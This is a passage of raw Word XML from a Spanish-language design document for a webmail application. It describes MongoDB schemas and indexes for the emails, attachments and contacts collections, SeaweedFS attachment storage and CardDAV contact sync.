            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FK a folders._id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">uid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compound (ESR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">UID IMAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">messageId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Message-ID RFC 822</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">threadId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hash del thread (JWZ)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[56]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">from.address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Email del remitente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">subject</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Atlas Search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Asunto decodificado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compound (ESR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fecha del header</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">flags.seen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Estado de lectura</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">hasAttachments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tiene adjuntos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">modseq</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Para CONDSTORE sync</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Índices:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{accountId: 1, folderId: 1, date: -1, uid: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— índice compuesto principal para listado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[204]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{accountId: 1, threadId: 1, date: -1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— para agrupar conversaciones.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{accountId: 1, flags.seen: 1, folderId: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— para contar no leídos por carpeta.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{accountId: 1, "from.address": 1, date: -1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— para listar emails por remitente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para búsqueda full-text sobre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">subject</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">from.address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">preview</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, se utiliza MongoDB Atlas Search (basado en Apache Lucene), que ofrece sincronización automática de datos, highlighting, fuzzy search y autocomplete sin requerir infraestructura adicional</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[132]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Atlas Search cubre el 90% de los casos de uso de búsqueda en webmail y elimina la complejidad operacional de mantener un cluster Elasticsearch separado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[129]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="82"/>
    <w:bookmarkStart w:id="83" w:name="colección-attachments-metadata"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.5 Colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">attachments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Metadata</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los archivos adjuntos se almacenan físicamente en SeaweedFS (object storage S3-compatible con licencia Apache 2.0, optimizado para archivos pequeños y alto I/O)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[177]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">attachments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mantiene únicamente la metadata necesaria para localizar, nombrar y presentar los adjuntos en la interfaz.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> IAttachment {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  _id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Referencia al email que contiene el adjunto */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  emailId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Referencia a la cuenta */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Nombre original del archivo */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  filename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MIME type (ej: application/pdf, image/png) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  contentType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Tamaño en bytes */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  size</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** CID para adjuntos inline (Content-ID) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  contentId</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Si es un adjunto inline (mostrado dentro del cuerpo HTML) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  inline</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">   * Clave de almacenamiento en SeaweedFS.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">   * Formato: {accountId}/{emailUid}/{hash_filename}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">   */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  storageKey</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Checksum SHA-256 para verificación de integridad */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  checksum</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Si está disponible para descarga/preview */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  available</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Metadata de imágenes (si aplica) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  imageMeta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    width</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thumbnailStorageKey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Timestamp de creación */</w:t>
      </w:r>
      <w:r>
        <w:br/>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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">storageKey</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sigue una convención jerárquica que facilita el listado y la limpieza:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{accountId}/{emailUid}/{hash}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Cuando un email se elimina permanentemente, todos los adjuntos con su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">emailId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se eliminan en cascada de SeaweedFS mediante un job de background en BullMQ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[203]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Índices:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{emailId: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— para listar adjuntos de un email.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{accountId: 1, createdAt: -1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— para listar adjuntos recientes por cuenta.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{storageKey: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— unique, para prevenir duplicados de almacenamiento.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="83"/>
    <w:bookmarkStart w:id="84" w:name="colección-contacts-agenda-básica"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.6 Colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">contacts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Agenda Básica</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">contacts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">implementa una agenda de contactos integrada que puede sincronizarse bidireccionalmente con servidores CardDAV vía tsdav, la librería TypeScript más moderna y activa para CalDAV/CardDAV con ~113,580 descargas semanales en npm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[190]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
